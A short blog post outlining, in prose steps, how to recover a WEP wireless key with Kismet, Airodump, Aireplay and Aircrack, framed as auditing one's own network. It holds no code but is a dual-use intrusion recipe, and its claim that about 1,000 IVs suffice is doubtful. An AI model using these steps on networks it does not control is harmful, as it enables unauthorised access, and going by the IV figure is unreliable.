I recently stumbled upon a website that spoke of how the FBI was able to crack a 128bit WEP password in 3-4 minutes. In this article, I am going to go through the steps (in a more condensed form from what is beyond the link) so that you can audit your wireless network, or spread the word to wireless network administrators you may know.
The programs that are listed here will most likely not be too friendly for anyone unfamiliar with Linux, as most, if not all of the programs are on *nix platforms. If all else fails, or if you’re adamant about wanting to do this yourself, you could easily just Google for help, or alternatively RTFM.
- Run Kismet to target nearby networks and obtain SSID and channel.
- Run Airodump to capture data.
- Use Aireplay to replay a packet on targeted network. (Finding a good packet requires looking at the BSSID MAC on Kismet and comparing it to the captured packet’s BSSID MAC.)
- Airodump should start getting a lot of new IVs.
- 1,000 IVs is probably enough so you can stop there if you wish.
- Run Aircrack on the captured file.
- A WEP key should show up shortly!
Programs: Kismet, Aircrack (includes Airodump, Aireplay, Aircrack, and Airdecap).
